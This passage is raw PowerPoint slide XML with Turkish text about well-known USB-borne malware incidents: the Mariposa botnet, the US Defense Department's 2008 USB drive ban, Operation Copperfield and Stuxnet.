            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>ve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>ardından</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>virüslü</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>dizüstü</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bilgisayarı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>yardımcı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>programa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>geri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>getirerek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> Mariposa </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>botnet'i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>birden</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>çok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>iş</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>sistemine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>yaydı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="tr-TR" b="1" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>ABD Savunma Bakanlığı’nın USB Sürücüleri Yasaklaması (2008)</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" sz="2400" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>2008'de US CERT, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>kötü</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>amaçlı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>kodun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> USB </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>sürücüler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>aracılığıyla</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>yayıldığına</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>dair</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>uyarı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>yayınladı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>Aynı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>zamanda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>, ABD </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>Savunma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>Bakanlığı</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yazılımın</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>potansiyel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>yayılımı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>nedeniyle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> USB </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>sürücülerin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>ve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>diğer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>çıkarılabilir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>depolama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>cihazlarının</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>kullanımını</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>geçici</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>olarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>yasakladı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="tr-TR" b="1" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>Copperfield</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="1" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> Operasyonu (2017)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Industrial Safety and Security Source, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>çalışanın</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>Orta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>Doğu'daki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>kritik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>altyapı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bilgisayarında</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> filmi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>indirmek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>ve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>izlemek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>için</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> USB </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>sürücüsünü</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>nasıl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>kullandığını</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>anlattı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>Operatör</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>eylemlerinin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>, 'Copperfield' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>olarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bilinen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>ve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>veri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>sızıntısına</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> ICS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>iş</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>istasyonunun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>uzaktan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>kontrolüne</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>ve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>ağ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>taramasına</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>neden</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>olabilecek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a: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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>parçası</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>yaymaktaydı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="tr-TR" b="1" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>Stuxnet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="1" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> Saldırısı</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Stuxnet, 2010 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>yılında</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>ortaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>çıkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>arkasında</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> ABD </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>ve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>İsrail’in</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>olduğu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>düşünülen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>ve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>İran’ın</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>nükleer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>çalışmalarını</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>sekteye</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>uğratmak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>amacıyla</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>kullanılan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
